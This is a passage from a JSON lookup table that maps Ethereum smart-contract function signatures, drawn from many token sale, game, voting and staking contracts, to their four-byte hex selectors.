"0x0ef67887", "clearAll()": "0xebb689a1", "addBeneficiary(address,uint256,uint256,uint256,uint256,bool,string)": "0xfcf7e73d", "changePauseTranfser(bool)": "0x2946ae5d", "QuadCoin()": "0x185b9067", "buyFrom(address)": "0x691a3f64", "transferHolds(address,address,uint256)": "0x100e187a", "Share()": "0xdc6c0cdd", "restoreBalances(address[60],uint256[60],uint256[60])": "0xbc17991d", "ForexCoin()": "0xebc1b4f1", "calculateInterest(address,uint256)": "0xd7dc6203", "InterestFinal(address,address)": "0x575f7832", "initOwner1(address)": "0x26a3f45d", "PSYT()": "0xb42748d3", "BPCC(uint256,string,string)": "0x48eaeb72", "IDToken()": "0xa68567ac", "Kristina()": "0xc8cb7d04", "getQuantities(address)": "0x461df016", "creationUnit()": "0x119e5cdf", "CoinstocksToken(uint256,string,string)": "0x97fbbfd1", "BINOToken()": "0xe166bebd", "InooviToken()": "0x9fc1ff30", "TradeToken(address,string,string,uint256,uint256)": "0xc418c8c9", "ExtremeSetupToken()": "0xc427a68b", "HeroNodeToken()": "0xda5520cd", "removeAddressFromAdminlist(address)": "0xe44451ba", "addAddressToAdminlist(address)": "0xb5f3e71a", "isAdminAddress(address)": "0x0236bb5a", "OAToken()": "0x6cf72694", "SupbToken()": "0x203e0dc9", "CustomToken(string,string,uint8,uint256)": "0x46c49c58", "Kurecoin()": "0x27f1f521", "TradelizeToken(uint256)": "0x1eeac5d5", "checkLargeContributionsLock(address,address,uint256)": "0x58e9a706", "isTransferAllowed(address,address,uint256)": "0xf7ebc39a", "logLargeContribution(address,address,uint256)": "0x57ebc7a8", "decreaseAfterBurn(address,address,uint256)": "0x56a620aa", "log(address,address,uint256)": "0x17fe6185", "setContributionLockPeriod(uint256)": "0x51e4eb07", "setRefferal(address)": "0xd1cbfe65", "LockupContract(address,address,address)": "0xfcb2931b", "claimUnsoldTokens()": "0x7dfa7d79", "multivestMint(address,address,uint256,uint8,bytes32,bytes32)": "0x18c26389", "Referral(address,address)": "0x9d05414f", "mintPreICO(address,address,uint256,uint256,uint256)": "0x671de554", "calculateTokensAmount(uint256,bool)": "0xf9df6c33", "getActiveTier()": "0xb961716b", "transferCompensationEthers()": "0xb3d7ac6a", "changeICODates(uint8,uint256,uint256)": "0xdc8d26ad", "changePreICODates(uint256,uint256)": "0x2fd4f2f9", "transferEthersInternal()": "0x4083e935", "setEtherInUSDInternal(string)": "0x1c657c63", "setEtherPriceInUSD(string)": "0x080692bd", "updateWhitelist(address,address,bool)": "0x137db23c", "SellableToken(address,address,address,uint256,uint256)": "0x8334e170", "transferAllowed(address,address,uint256)": "0xff125c8a", "setLockupContract(address)": "0x7c1595f2", "ElyToken(address,bool)": "0xaa6b5d9f", "ElyERC20(uint256,string,uint8,string,bool,bool)": "0x1f8814ad", "isAdminSet()": "0x01b057b1", "transwerFunds(uint256)": "0xf12d15c3", "returnExternalPayments(address,bool,bool)": "0xbb36e5d0", "returnDirectPayments(address,bool,bool)": "0x9536e0bb", "updateRevertSuspendedPayment(bool)": "0x7b3f0fb7", "exchangeRateIdx(uint256)": "0x970a5fa8", "getTreshold(uint256)": "0x8c95acee", "unBan(address)": "0xc8961644", "updateExchangeRate(uint8,uint256,uint256)": "0x1d89dbc9", "burnLeftoverTokens(uint8)": "0x1b06128b", "refundParticipant(address)": "0x0aa79fc6", "Investment()": "0xd1bba64f", "maxEarlyPresaleEDUSupply()": "0x7583a523", "tickerQueryData()": "0xae24e328", "allowManuallyMintTokens()": "0xfd90a668", "silverSaleLimit()": "0xb48666ee", "presaleOn()": "0x1ad874b4", "phase_1_remaining_tokens()": "0x44605ea0", "PRICE_CHANGE_TIME_STEP()": "0xe71d77a7", "rateFirstWeek()": "0xb3007dc6", "gameToken()": "0xc3dfdae6", "orderCount()": "0x2453ffa8", "RESERVED_TOKENS_FOR_FINANCIAL_INSTITUTION()": "0xdb060e1a", "LimitPerUserEBC()": "0x584df977", "payoutCompleted()": "0xda7fc7c5", "TOKEN_UNIT()": "0xa5c9cd82", "premiumHold()": "0xb91e3422", "controlSum()": "0xe1e5c093", "pricePerMessage()": "0x25e1b5e4", "Partial20Send()": "0xea9f0c4c", "THIRD_PARTY_LOCKUP()": "0xeab4fb18", "rescueIndex()": "0xee04b4b9", "TANK_TYPE()": "0x2fc60405", "isRightBranch()": "0x5f34165d", "montly_pay()": "0xf6af18f5", "silencePeriod()": "0x3cae09ac", "bonus10end()": "0xff993272", "initAffiliate()": "0x82e97740", "getDonationAmount()": "0x59be7e99", "vuePayETHDestination()": "0x4f6b1a70", "mood()": "0x70ffe53d", "OBR_Duration()": "0x55de97ac", "allowedWithdraw()": "0xaaa2b78f", "basicRate()": "0x01623ee4", "feeForSplitterCreation()": "0x6c012923", "LOCKPERIOD()": "0x6dacda85", "second_bonus_duration()": "0xc34ef9af", "buyRtc()": "0x7ed32df6", "RoundASold()": "0x15ab8302", "marketCoins()": "0xe13fafdb", "nextGameMaxBlock()": "0x332fa285", "newMostInviteTimes_()": "0xa807ea0f", "gemmyMusicSupply()": "0xda7fd1f0", "maxNumVotesPerAccount()": "0x6d4d907c", "raisedForEther()": "0x2f90daf4", "God()": "0x10174967", "maxEarningsClaimsRounds()": "0x038424c3", "privatePresaleWallet()": "0x21a6c649", "currentMintedTokens()": "0x2de22cdb", "hasRate()": "0x7556e07f", "hexControllerAddr()": "0x4822d008", "p1_duration()": "0x3950d1b2", "secondsaleclosingTime()": "0xe65e63ed", "MAX_TOKENS_AIRDROPS_BOUNTIES()": "0x25c62d5a", "developerfee()": "0x423a7954", "ethPrice()": "0xff186b2e", "ethusd()": "0x61150aae", "externalStorage()": "0x88d7cd97", "totalDistributedr()": "0x146124f9", "promotionRatio()": "0x7a07424e", "calcTokensAvailableToBuyback()": "0x3b29c470", "ibcFunded()": "0x7228057f", "couponTokenSaleAddr()": "0xdd1eee44", "sta()": "0x4d17f7fc", "EXPECTED_END()": "0xa86bc181", "bbBalance()": "0xec5dfb84", "dayEthInLimit_()": "0x7ef61e28", "FEE_SELECT_MARGIN_SPLIT()": "0xe95d716c", "reserveAddr()": "0xe282726b", "lovelock_price_LOV()": "0x17549ff0", "DEVELOPER_CUT()": "0xdac8df25", "maxWeis()": "0x3a365403", "Centspooladdress()": "0xb45db978", "ownerPercentage()": "0x41da7555", "pecunioTokenBalance()": "0xea7b5df3", "CITY_INCREASE_RATE()": "0xc7516da7", "countOfAddresses()": "0x17a7f9b2", "tickets()": "0x21858521", "poolFees()": "0x33580959", "ICO2Period()": "0xe8b0a262", "buyBackInvestedValue()": "0x4e7e96f1", "whitelistBonusSent()": "0x084a4011", "mintPerBlock()": "0xa7e03dcb", "_fFinish()": "0x38f0de1f", "crowdsaleEndedSuccessfully()": "0x158d1fd4", "MAX_TOKEN_SALES()": "0xa4136272", "endIcoSaleRound1()": "0xf44a06b9", "party_b()": "0x27cc1fd8", "fiatPerEth()": "0x051e5c45", "minTicket()": "0xf6a30e3e", "PRESALE_ETH_CAP()": "0x465a092d", "BTCRate()": "0xfec5d3b0", "unlockOwnerDate()": "0x0204d0f8", "updateMCs()": "0x1b998dac", "m_maxTotalSupply()": "0x6a8aa343", "baseNumber()": "0xd634ba22", "lastDividendIncreaseDate()": "0x51f9ff35", "preIcoEndDate()": "0x44edf6b2", "LOCK_RELASE_TIME()": "0x760a221c", "num_claimed()": "0x4edac8ac", "getLambosCount()": "0x106a182b", "burnAccountMoeny(address,uint256)": "0x5c221816", "adminSendMoneyToUser(address,uint256)": "0x7d7c7258", "setPresentMoney(uint256)": "0x827f143e", "catGenes(uint256)": "0x6b2fd0e7", "enter(uint256)": "0xa59f3e0c", "maxRandom(uint256)": "0xfbec9121", "bitSlice(uint256,uint256,uint256)": "0xa30eddcc", "fight(bytes32,bytes32,bytes32)": "0xe89f7672", "CoinViewToken()": "0x022cabac", "dismissTokenOperator(address)": "0x7307b805", "assignTokenOperator(address)": "0xcdef3911", "removeFundAccount(address)": "0x48803406", "addFundAccount(address)": "0xa18bf6e9", "setETHAssets(address)": "0x126c27b5", "setXPAAssets(address)": "0x40a2bfc1", "allowToBurn(address)": "0x43e0c65a", "dismissBunner(address)": "0xffde8eae", "assignBurner(address)": "0x97c08da6", "XPAAssetToken(string,string,uint256)": "0x735958f2", "checkOperator(address)": "0xde1ac2fd", "dismissOperator(address)": "0x85ddf726", "transferLock(address,uint256,bool)": "0xac6b8e00", "GDC(address,address,address,address,address)": "0xb810bfa4", "GetRichQuick()": "0x981cc7ae", "INZEI()": "0x643124cf", "DentacoinTimeLock()": "0x31ffc9fa", "getMyBat()": "0x3d03a284", "getFreeBat()": "0x808757ac", "getBatlordReq()": "0x6a596455", "becomeBatlord()": "0x789ea7dc", "BBCPrimeEx()": "0x5aa97e16", "setNewWhiteList(address)": "0xdccdc893", "calculateReferralBonus(uint256)": "0x5e943a30", "calculateBonus(uint256,address)": "0xd2f28141", "AnythingAppTokenPreSale(address,address,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x6e49b1e1", "AnythingAppToken()": "0x62f91eff", "KOCMOCToken()": "0xdcc8592c", "KOCMOC()": "0x1a974bb5", "StudentCoin()": "0x37531b45", "burn(uint256,address,address)": "0xef265d6d", "GeoGame()": "0xac76fbf1", "titanToken()": "0xf260ad05", "PatentCoinPreICO(address,address)": "0x61bfdc5d", "ArteufToken(address,address)": "0x8bfe88c5", "NiobiumToken()": "0xfdb986cc", "winEth(address,uint256)": "0xbfbb6a23", "loseEth(address,uint256)": "0x01ba6805", "determinePrize(uint256)": "0x4bef6de9", "maxRandom()": "0xe72f5f63", "bet(uint256,address)": "0x5f9b71ce", "getDevBalance()": "0xbee14b3d", "refundUser(address)": "0x72b38ab9", "panicButton(bool)": "0x37f03888", "betPool(address)": "0x595e615f", "etherSpin()": "0xbbc6049d", "spinAllTokens()": "0x4606ccd1", "tokenSpin(uint256)": "0xa79726b7", "sellAll()": "0x16e457f0", "init(string,uint256,uint256,uint256)": "0xa377104c", "withdrawCoinToOwner(uint256)": "0x7943f2ec", "AgentWallet()": "0x3c59c17a", "changeNameSymbol(string,string)": "0x501a4d68", "sendFrom(address,address,uint256)": "0x5c004bcc", "DinarETHCrypto()": "0x52642070", "setGoldCertVerifier(string)": "0xa7d82b00", "getGoldXchgRate()": "0xfa9af30f", "AMPTToken()": "0x5ea4cf50", "ChildChains()": "0x087ded64", "ProvidencePresale()": "0xdeb80d66", "getEquipTokens(address)": "0x0eacecd2", "equipDown(uint256)": "0xe26fdc12", "equipUp(uint256[6])": "0xa1be79a0", "_equipDownOne(address,uint16)": "0xa3b8cd3b", "_equipUpOne(address,uint256)": "0xe1fcad6a", "DataEquip(address)": "0x8597705f", "OldRopeToken()": "0xc2c06f20", "setCurrentVersion(string)": "0x13930cf6", "setCurrentRate(uint256)": "0x0b5f2efd", "NT()": "0x0cd4700a", "ABLGenesisToken()": "0xb41bfa6a", "transferFrom(address,address,address,address,uint256)": "0x6e275bd2", "removeLocking(bool)": "0x97f3bb0c", "finaliseVoting(uint256)": "0xaf5a3db8", "submitVote(uint256,bool)": "0x612c56fa", "VotedForProposal(uint256,address)": "0xcfefcfb0", "startVoting(uint256,string)": "0xb1330ca9", "mint_Crowdsale(address)": "0x556a3689", "Bonus_PoolTransfer(address,uint256)": "0xd1cdfe84", "getAnnualInterest(uint256)": "0xd2cced90", "getCoinAgeInternal(address,address,uint256)": "0x74891e1b", "calculateRewardInternal(address,address,uint256)": "0x493322c0", "logCoinAgeRecord(address,address,uint256)": "0xa13c58f7", "startStakingAt(uint256)": "0xe48225ce", "calculateRewardForAddressAt(address,address,uint256)": "0x46172c04", "calculateRewardForAddress(address,address)": "0xfee9aa44", "coinAgeForAddressAt(address,address,uint256)": "0x490b4f92", "coinAgeForAddress(address,address)": "0xb9e15a67", "coinAgeRecordForAddress(address,address,uint256)": "0x7c61b482", "calculateRewardAt(uint256)": "0xd74d7e79", "calculateReward()": "0x725cedd3", "dagheAcqua(uint256)": "0x99801bce", "changeTreeAttributes(uint256,string,string)": "0x82dfe1fb", "getForestCount()": "0xb412b1e9", "createTree(string,string)": "0x61f188de", "_createTree(string,string,uint256)": "0x777ac522", "RedPillCoin()": "0x4afc0476", "SUNQToken()": "0xacada0d8", "PlanetZeroToken()": "0xa11df9c7", "landPricePrevious()": "0x00d7e9cf", "landPriceCurrent()": "0x4e5f13bc", "redeemLand(address)": "0xe89aeaca", "purchaseLand()": "0x207b89e2", "bulkPurchageLand()": "0x69a1aa95", "setIcostart(bool)": "0x2b8d0cd7", "icocontract()": "0x216481d6", "CrowdDevAllocation(address)": "0x2d873f21", "current_week()": "0xc648843a", "get_current_price()": "0x676a38d7", "init(uint256,uint256)": "0xa5843f08", "CrowdCoinICO(address,address,address)": "0x696f8a95", "successfully_closed()": "0x3e8ce607", "CrowdCoinPreICO(address,address,address)": "0xed5e7691", "get_bonus(uint256)": "0x0565ac43", "transfer_coins(address,uint256)": "0x62806296", "burn_balance(address)": "0x037b5fdc", "mint_tokens(address,uint256)": "0xd35cf913", "init_ico(address)": "0x73d6c2ec", "close_pre_ico()": "0x2d740722", "init_pre_ico(address)": "0xef4080bd", "setTxCount(address,uint256)": "0xb0d08d3d", "multisendEther(address[],uint256[])": "0xab883d28", "discountRate(address)": "0xeff8e748", "currentFee(address)": "0x591552da", "setDiscountStep(uint256)": "0x2f781393", "discountStep()": "0xe4e1f29b", "arrayLimit()": "0xb4ae641c", "txCount(address)": "0xc1258f69", "pendingOwner()": "0xe30c3978", "updatePriceOfToken(uint256)": "0xe45499c1", "PTMCrowdFund()": "0x2f2c00f3", "WMCToken(uint256,string,string)": "0xab989586", "PKTToken()": "0xd64e4e1b", "AlienFarmer()": "0xc8f0d741", "emergency_withdraw(address)": "0xa852d5ba", "BCTT()": "0x0e69782b", "Fortune()": "0x26387b07", "VICETOKEN_ICO_IS_FAKE()": "0x0e496d25", "MithrilSword()": "0xb86c9845", "BlockPayeeToken(uint256,string,string)": "0x3ed23f91", "TRONIX()": "0x5d90df32", "StarWarsRTscore()": "0xc51cd5d6", "Beercoin()": "0xb9e7e2f9", "HussyToken()": "0xbe8b4f45", "DreamBit()": "0x0176b596", "NDT2Token()": "0x07ee9df2", "poolcoin(uint256,string,string)": "0x79e35d0b", "ContractEFT()": "0xbb8bbc90", "TYCOONCoin(uint256,string,string)": "0x224b4bfd", "Excalibur()": "0xbb731f98", "TUIToken()": "0xc4543386", "post(uint128,uint32,address)": "0x5a686699", "changeTokenManager(address)": "0x7635e1de", "initSale2()": "0x6e8851a9", "createSale2()": "0xa25d8973", "initSale1()": "0x8c165146", "createSale1()": "0x2bccf04e", "CreateToken()": "0xa2ea2aaf", "burn_from(address,address,uint256)": "0x52447d92", "transfers(address[],uint256[])": "0x52346412", "StormToken(address)": "0xf76bf292", "allocateOwnerTokens()": "0x8548cc21", "canBuyTokens()": "0x78710f72", "allocateTeamTokens()": "0x306023a3", "BITSDToken()": "0xab1ac9f6", "superchain()": "0x3a237322", "BKToken()": "0x8a340eab", "accrueEther()": "0x5f3c91ad", "MailhustleCrowdsale()": "0x76ff1d24", "UnicornChain()": "0x212ac4b5", "setMajorEvent(string,string,string)": "0x6753a3c1", "setStatus(string,string)": "0xc5590033", "createMarriage(string,string,string,string)": "0xfadcd861", "numberOfMessages()": "0xfbda68e2", "numberOfMajorEvents()": "0xdc0c1a27", "Marriage(address)": "0x9506a57a", "HyperIslandCoin()": "0x3228afcb", "BitGCoin(uint256,string,uint8,string)": "0x17813d37", "pricePerWei()": "0x34dc3c32", "UNLB()": "0xb0e0346e", "EOSSale(uint256,uint128,uint256,uint256,uint128,string)": "0xd4a28823", "getIsStopFunding()": "0x6f7154c8", "isFundingNow()": "0x22cfadc7", "getIcoTime()": "0xb24539a9", "setStopFunding(bool)": "0x03606b30", "setIcoTimeStartEnd(uint256,uint256)": "0x5d145c5b", "setIcoStartTime(uint256)": "0x000b66d3", "getMaxiumInputEther()": "0xec29ff7c", "setMaxiumInputEther(uint256)": "0xe7d03e93", "getMiniumInputEther()": "0xb4750ca0", "setMiniumInputEther(uint256)": "0xd955ec17", "AquaToken(uint256,string,string,uint8,uint8,address)": "0x509f6ff8", "BUXCOIN()": "0xd88b9732", "UNIToken(uint256)": "0xab6cb831", "processWhenStop()": "0xed996590", "releaseForEarlyInvestor(address,uint256)": "0x1fd982a5", "releaseForIco(address,uint256)": "0xe32b6325", "releaseForYoobaTeam()": "0x6eca017e", "releaseForEcosystem()": "0x6799d737", "initAirdropAndEarlyAlloc()": "0xcc7b2ee7", "YOOBAToken(address,address,address,address,address)": "0x8f2a6d3e", "StandardERC20Token(string,string,uint8)": "0x630dbe79", "isSoleout()": "0x0142c9ae", "afterCrowdSale()": "0x602fbd79", "rewardRate()": "0x7b0a47ee", "DYLC_ERC20Token()": "0xe1248d52", "transferFromWithData(address,address,uint256,bytes32)": "0xff8fa0dd", "transferWithData(address,uint256,bytes32)": "0xc529b80b", "getAllFunding()": "0xee069097", "getFunding_Old(uint256)": "0x1e1ad51c", "getFunding(address,uint256)": "0xbe3ca849", "makerich4(address,uint256)": "0x28278d0a", "AppSupply(address,uint256)": "0x0484c7cf", "FisrtSupply(address,uint256)": "0x6aa52288", "burnNSPs(address,uint256)": "0xb3002be7", "NSPToken()": "0x9e975ca6", "NSPFallback(address,uint256,uint256)": "0xca2177ef", "transferToContract(address,uint256,uint256)": "0x95f847fd", "TigerCashToken()": "0x58dc03f9", "YGO()": "0x84e85974", "NeyrosNetwork()": "0x3b1ef91c", "Aphrodite()": "0xcb029785", "ATC()": "0x70c494fc", "AlfaTowerShares()": "0x9602339d", "ABEToken()": "0x4cb88ad8", "DragonToken(address)": "0x3a344ab8", "DragonReleaseableToken(address)": "0x5ab98b8d", "freezeForOwner(uint256,uint256)": "0x19216e8d", "toDay(uint256)": "0xa8e496b9", "giveTokens(address,uint256)": "0x68dc9528", "numberOfRound()": "0x2f0b0222", "CrowdsalePhase1(uint256)": "0x55dd16cd", "GenbbyToken()": "0x24612b5d", "upgradeAllowance(address,address)": "0x3f3bdc6c", "upgradeBalanceOf(address)": "0x683cde49", "stopUpgrading()": "0x2d29c72d", "startUpgrading()": "0x929c4649", "upgradePendingExchange(address,uint256)": "0xa559ec20", "upgradeAllowance(address,address,uint256)": "0x059b8140", "upgradeBalance(address,uint256)": "0x9bc30adb", "isATrustedContract(address)": "0x198a2085", "setTrustedContract(address,bool)": "0x5be4d442", "isMintAgent(address)": "0xfd228c0b", "KOKOCoin()": "0x2a6852bf", "dCHF()": "0x976934ac", "AirDropPromo(string,string)": "0x5534236e", "ExacoreContract(uint256,string,string)": "0xe0a4aacb", "updateHardCap(uint256)": "0x703df793", "transferRemainingTokens(address,uint256)": "0x9eb7294d", "secSaleSpenderTxDetails(uint256)": "0x337188d9", "firstSaleSpenderTxDetails(uint256)": "0x6c4040c5", "preSaleSpenderTxDetails(uint256)": "0x1f903b5d", "secondSaleDelivery(address,uint256)": "0x9a0e7e8e", "firstSaleDelivery(address,uint256)": "0xbd320dde", "preSaleDelivery(address,uint256)": "0xdb412f39", "_forwardFunds(address)": "0xbde2ddf2", "TotalSpenders()": "0x63981bbc", "_setFunds(address,uint256)": "0xc1c74dde", "_checkOpenings(uint256)": "0x203b2352", "stopSecondSale()": "0xd01f4ffe", "startSecondSale()": "0xce6eaef5", "TokenAllocate(address,uint256)": "0xbeab0638", "_setMoreDetails(uint256,uint256,uint256,uint256,uint256,address)": "0x457b4e1b", "_setWallets(address,address,address,address)": "0x46bf3df3", "_setTimes()": "0xfbbdbf22", "BelottoCrowdsale(uint256,uint256,uint256,uint256,uint256,address,address,address,address,address,address)": "0xe7ba2cc8", "totalRemainingTokens()": "0x583f18ff", "ergoam(uint256,string,string)": "0x5ed85753", "burnFrom(uint256)": "0x274ff7ce", "ergo()": "0x29689a8c", "KudoCoin()": "0x850e47db", "YELLOWLAMBO()": "0xf7e98d15", "callWithdraw(address)": "0x218fbdec", "requestArbitration(address,bytes32)": "0x2609037c", "submitAnswerByArbitrator(address,bytes32,bytes32,address)": "0xdce4b34e", "setQuestionFee(address,uint256)": "0xbe882d91", "getDisputeFee(bytes32)": "0xa22352e2", "setCustomDisputeFee(bytes32,uint256)": "0x4381a07b", "setDisputeFee(uint256)": "0x17299c04", "Arbitrator()": "0x20076659", "isFinalized(bytes32)": "0x7f8d429e", "notifyOfArbitrationRequest(bytes32,address)": "0x3e4e0432", "submitAnswerByArbitrator(bytes32,bytes32,address)": "0xfe92049d", "finalizeByArbitrator(bytes32,bytes32)": "0x23191bf1", "getResultTable(uint256,uint256)": "0x29bf960a", "getWinnerInfo(uint256)": "0x6b1da364", "getWinnerList()": "0x7fc5af95", "getPrizeByToken(uint256)": "0xdfb873fb", "getMyPrize()": "0x315fe684", "checkIsWinner(uint256)": "0xea5b2ae2", "setCountWinnerByPlace(uint256,uint256,uint256)": "0x10f6e2a6", "setPowerContract(address)": "0xb63c2ac4", "getK()": "0xee39e7a0", "LukapToken()": "0x7dcc3f0c", "UTPLToken()": "0x2adf68bb", "metaSet(address,uint256)": "0x99613a3f", "building(uint256)": "0x66ad3ffc", "setBuildingContract(address)": "0x47e81c5f", "getRoomPlayers(uint256)": "0x43925cc3", "createRoom()": "0x3be272aa", "hopeCoin(uint256,string,string)": "0xbb2e6904", "POPPToken()": "0x34791ae5", "delegateVote(int256,address)": "0xb2fce4ea", "castVote(uint256,bool)": "0x15373e3d", "makeProposal(string,string,uint256)": "0x380e5e44", "releaseToMgmtTeam(address,uint256)": "0x72f5fccd", "releaseToEarlyInvestors(address,uint256)": "0xf66d1f65", "releaseToAdvisor(address,uint256)": "0xc0b9b8ce", "receiveTokenLoot(uint256[],uint256,uint8,bytes32,bytes32)": "0x4dcf7430", "setTokens(address[])": "0x625adaf2", "LigmaToken()": "0x32df52aa", "CheckStudentofCourse(uint256)": "0x4c5f338b", "rejectCertification()": "0x505f2697", "approveCertification()": "0x59b51bd1", "CountStudentnRequests()": "0x905b8000", "CountCourses()": "0x1fd22140", "StandardToken(address,string,string,uint8,uint256,bool)": "0xc635d65e", "TraToken()": "0x91c03391", "ELVToken()": "0x53a9fc9c", "AnkitVictoContractToken()": "0x49acce72", "AnkitVictoToken()": "0x741ed475", "voteForCandidate(string,string)": "0x8329ac52", "totalVotesFor(string)": "0x4a3bf377", "authenticateVoter(string)": "0x7d112d64", "getVoter(string)": "0x14a0069a", "AddVoters(string)": "0xe92b7f4b", "AddCandidate(string)": "0x7e54b8e2", "VirtualRewardToken()": "0x8ee97ff4", "MANW()": "0xcf9f5ef6", "getWeaponNumber()": "0xe5a01e69", "getContract(uint8)": "0xde981f1b", "addWeapon(address)": "0x5c66bd58", "WeaponRegistry()": "0x6aa8e220", "use(uint8,uint8,uint8,uint8[176])": "0x6c70abda", "nujaBattleTransfer(address,uint256)": "0xa52f89fa", "terminateServer(uint256,uint8)": "0x32d69342", "removePlayer(uint256,uint8)": "0xab6c5f58", "getCharacterServer(uint256)": "0xd546c975", "playerCharacter(uint256,uint8)": "0x1a871a2c", "isAddressInServer(uint256,address)": "0xe75cdd7b", "getAddressFromIndex(uint256,uint8)": "0xe6a50d84", "getIndexFromAddress(uint256,address)": "0xc9ba93be", "getInitialState(uint256)": "0x140604cc", "getServerUserIndex(address,uint256)": "0xd6914217", "getServerUserNumber(address)": "0x24ac4e65", "getServerBuildingName(uint256,uint8,uint8)": "0xe3d5d88b", "getServerBuildingWeapon(uint256,uint8,uint8)": "0xd013a182", "getServerMoneyBag(uint256)": "0xd141138e", "getServerFee(uint256)": "0x94ff4b2b", "getServerInfo(uint256)": "0xff097659", "getServerState(uint256)": "0x912ff8f6", "getPlayerNb(uint256)": "0x90445e9f", "getPlayerMax(uint256)": "0x4c281603", "getServerCurrentMatch(uint256)": "0x028af743", "getMatchServer(uint256)": "0xbaad1532", "getServerName(uint256)": "0xeacfb78a", "getServerCreationFee()": "0xd8cf9184", "getCheatWarrant()": "0x422b423e", "getServerNb()": "0xeb53d273", "startServer(uint256)": "0xcb99cbac", "removePlayerFromServer(uint256)": "0xdabbd2bd", "addPlayerToServer(uint256,uint256)": "0x98d0de03", "removeBuildingFromServer(uint256,uint8[10],uint8[10],uint8)": "0x61dfacf2", "addBuildingToServer(uint256,uint8[10],uint8[10],uint8[10],bytes32[10],uint8)": "0xc38678c3", "changeServerState(uint256)": "0x1995b86d", "addServer(string,uint8,uint256,uint256)": "0x694b1727", "changeFeeAndCheatWarrant(uint256,uint256)": "0xa0bb233c", "setAddresses(address)": "0x81d3c435", "ServerManager()": "0xc32ff491", "isTimedout(uint256,uint256,uint256)": "0x276bf637", "timeoutPlayer(uint256,address,uint256,uint8)": "0x87903097", "getKilledArray(uint256)": "0xc0a0b5fa", "isKilled(uint256,uint8)": "0x7568353c", "verifyAllSigned(uint256,uint256[3],uint256[3],uint8[176])": "0x3313d27e", "verifyNextTurn(uint256,uint256[3],uint256[3],uint8[176])": "0x0841abd2", "nextTurn(uint256,uint256[3],uint8[176])": "0x377ab651", "usePower(uint256,uint8,uint8,uint8,uint8[176])": "0x24aee933", "useWeapon(uint8,uint8,uint8,uint8,uint8[176])": "0xe021b8cb", "exploreBuilding(uint8,uint8[176])": "0x1073c4a9", "simulate(uint256,uint8,uint8,uint8,uint8,uint8,uint8[176])": "0x547e6a5b", "NujaBattle()": "0x0aa86791", "power(uint8,uint8,uint8,uint8[176])": "0x30f46b70", "removeWeapon(uint8[176],uint8,uint8)": "0xfd074c28", "addWeapon(uint8[176],uint8,uint8)": "0x41587b08", "getWeapon(uint8[176],uint8,uint8)": "0xa59a3750", "getWeaponNb(uint8[176],uint8)": "0xd4f0ebe6", "kill(uint8[176],uint8)": "0xccbe2a68", "isAlive(uint8[176],uint8)": "0x63c988f9", "restore(uint8[176],uint8,uint8)": "0xa45c793f", "damage(uint8[176],uint8,uint8)": "0x79053739", "getHealth(uint8[176],uint8)": "0xd42aa2f6", "inAngelPeriod()": "0xd048bc87", "inPublicPreSalePeriod()": "0x957f120e", "inPrivatePreSalePeriod()": "0x05b74d87", "getCurrentBonus(address)": "0x8812e897", "DBToken()": "0x7893f4c2", "setMintAgent(address,address,bool)": "0xb97e3b43", "CooperativeToken()": "0x180ca180", "LLV_v30_12()": "0x592ea64f", "KillerWhale()": "0xc53ffe66", "InternationalTourismPublicChain(uint256,string,uint8,string)": "0x93796317", "evacuateToVault()": "0x19869555", "topUpBalance()": "0x7efff887", "windowAt(uint256)": "0xaba3d017", "bigInt(uint256)": "0x71df8d09", "getFeeToTokenConversion(uint256)": "0xcdc62c03", "upgradeController(address)": "0xb9c2ee82", "doProxyAccounting(address,uint256,uint256)": "0x5ab14385", "doTakerPayment()": "0xde06b7f4", "doMakerPayment(address)": "0xf13ab647", "proxyAccountingCreation(address,uint256,uint256)": "0x4714c0aa", "contributeForMakers(address)": "0xdfca8fd2", "NectarController(address,address)": "0xaafbe1c0", "getAuthorisationStatus(address)": "0x0a5dc24d", "getRegistrationStatus(address)": "0xa8af4ff5", "activateWhitelist(bool)": "0x4cedfc0c", "deauthoriseMaker(address)": "0xe24a1d1e", "authoriseMaker(address)": "0x2dff7a2b", "deregister(address[])": "0x2b8b6667", "burnAndRetrieve(uint256)": "0x4f37edfd", "Rearden()": "0xea9b4be5", "enableBurning(bool)": "0xb45dd873", "NEC(address,address)": "0x17b88dd7", "reducePledgedFees(uint256)": "0x486575a5", "pledgeFees(uint256)": "0x4fa7e353", "totalPledgedFeesAt(uint256)": "0xc6d1d23d", "totalPledgedFees()": "0x311325bd", "Blogcoin()": "0x14f52c07", "setUnlockTime(uint256)": "0xdace4557", "balanceOfInvestor(address)": "0x7e8ecf4f", "checkTotalBalance(uint256[])": "0x25dd0ee6", "NoahDividend(address)": "0xe04a2525", "state2()": "0xefe51cca", "setStates(uint256,uint256,uint256,uint256)": "0x71d3de1b", "setState2WithStop(uint256,uint256)": "0x9783585d", "_BTC()": "0x30fa27cc", "get_nb(address)": "0x029ad03e", "get_power(address)": "0x8a8e5239", "miner()": "0x349dc329", "InitialPointUnit()": "0x4dc49b25", "oldBalanceOf(address)": "0xb7a3446c", "TetherToken(uint256,string,string,uint8)": "0x6e140e6c", "returnTransactionPrices(uint256)": "0x7b48de6b", "test(uint256,address)": "0xfb80fe9e", "calcFee(uint256)": "0x75dc7d8c", "CostToken()": "0xaf053b71", "unpause(string)": "0xe79faa58", "pause(string)": "0x6da66355", "MANHATTANPROXY3RDST()": "0xa9625fa8", "MinexoDigital()": "0xb8e046d1", "STBIToken()": "0xb16020a0", "readMessage(string)": "0x5771d6e4", "RandiveBhToken()": "0x106109c9", "theWord()": "0xb58e60db", "Why(string)": "0x16cac8c7", "prophecise(bytes32)": "0xb9ad36b9", "Site(string)": "0x9d5779ce", "Nostradamus()": "0x5ca6fa4a", "setSink(address)": "0x7796fb95", "checkMyAging(address)": "0x3fbfdefc", "addToAging(address,address,uint256,uint256)": "0x074a1594", "Hubble()": "0x0244ba4a", "HRY(uint256,string,string)": "0x2fbfc376", "KEP()": "0x465fe311", "contestEndTime()": "0x96fe5418", "XeniaToken()": "0xd359b0c7", "MetadollarCrw()": "0x01b852c9", "BergCoin()": "0x3ebbf394", "PDS()": "0x9cb42db4", "FTXToken(address)": "0xdf3aa1fc", "Zarina()": "0x3bcbb6d8", "claim(address,bytes32,bytes32,uint8,bytes32,bytes32)": "0xdbc56297", "Swap(address)": "0x39fded47", "getBTCAddr(bytes32,int256,bytes32,int256)": "0x70634626", "getCheckSum(bytes20)": "0x359976a7", "ethAddressPublicKey(bytes32,int256,bytes32,int256)": "0xf3f11048", "btcAddrPubKeyCompr(bytes32,bytes32)": "0xf19be31b", 